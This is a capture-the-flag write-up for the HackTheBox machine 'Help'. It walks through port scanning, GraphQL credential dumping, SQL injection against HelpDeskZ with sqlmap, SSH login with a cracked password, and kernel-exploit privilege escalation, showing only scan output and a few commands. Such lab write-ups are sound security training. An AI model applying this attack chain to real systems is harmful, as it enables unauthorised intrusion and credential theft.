Help
#Linux #SQLi #API
Help is an easy-rated Linux machine from HackTheBox created by cymtrick. In the current post, my IP is 10.10.14.23, and the target’s IP is 10.129.227.176
I assume that the machine is pretty random, with the version obtainable only by a "readme", that you know about it existence from git... the url vulnerable to sqli is really hidden, I didn't like this maachine at all.
Recon
nmap -p- --open -sS --min-rate 5000 10.129.227.176 -vvv -n
Nmap scan report for 10.129.227.176
Host is up, received reset ttl 128 (0.0027s latency).
Scanned at 2023-07-09 02:51:15 UTC for 40s
Not shown: 63200 filtered tcp ports (no-response), 2333 closed tcp ports (reset)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 128
80/tcp open http syn-ack ttl 128
3000/tcp open ppp syn-ack ttl 128
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 39.72 seconds
Raw packets sent: 196635 (8.652MB) | Rcvd: 40142 (1.606MB)nmap -sCV -p 22,80 10.129.227.176 -oN Target
Nmap scan report for 10.129.227.176
Host is up (0.021s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e5:bb:4d:9c:de:af:6b:bf:ba:8c:22:7a:d8:d7:43:28 (RSA)
| 256 d5:b0:10:50:74:86:a3:9f:c5:53:6f:3b:4a:24:61:19 (ECDSA)
|_ 256 e2:1b:88:d3:76:21:d4:1e:38:15:4a:81:11:b7:99:07 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
3000/tcp open http Node.js Express framework
|_http-title: Site doesn't have a title (application/json; charset=utf-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelBrowser: http://help.htb
At this point we have nothing, it just a web site with the default index, from this point the best option is to FUZZ the target.
"Support" and "JavaScript", virtually there is nothing, let's explore another port
We don't have any credentials or tools to use here...
Port 3000
All right, this looks like a taunt, let's extract more information
Nothing from curl, maybe we should fuzz it with a wordlist specific for API.
So, there is a GraphQL running at the API, now we have to work with specific exploits.
Usually Graphql is exploitable with POST, so intercept with Burpsuite, change the request method, add the line "Content-Type: application/json" and apply the first suggested payload
It works, and you can do the same with Curl
We know that there is a "User" around, so we want now to dump it.
And we found an email and a password, this should work for at other website, but first we need to thecrypt the password.
Exploitation
Reverse Shell (Help)
After exploring the website and testing the ticket system, I found nothing... let's just search about "HelpDeskZ Github"
Edit the python script and add at the first line: #-- coding: utf-8 --
And at line 94, change to session = requests.session()
Ok, we need to submit another ticket with a file, and then execute the exploit again and wait.
At the end, it does not work, but at least now we know the URL where the injection happens.
Intercept the downloading process of a file, and save the request (saved as request).
Now execute sqlmap to extract the password.
We have the hash, slq1, after decrypt the password is { Welcome1 }, login through ssh to the machine.
Privileges Escalation
We have the first flag, now we do some basic test for escalation
We found an unusually old version at "uname -a", after searching for "Linux Kernel 4.4.0-116" at exploitDB we found something.
Copy the script as "exploit.c" at tmp (paste using nano), and then compile with the command gcc -o attack exploit.c
Last updated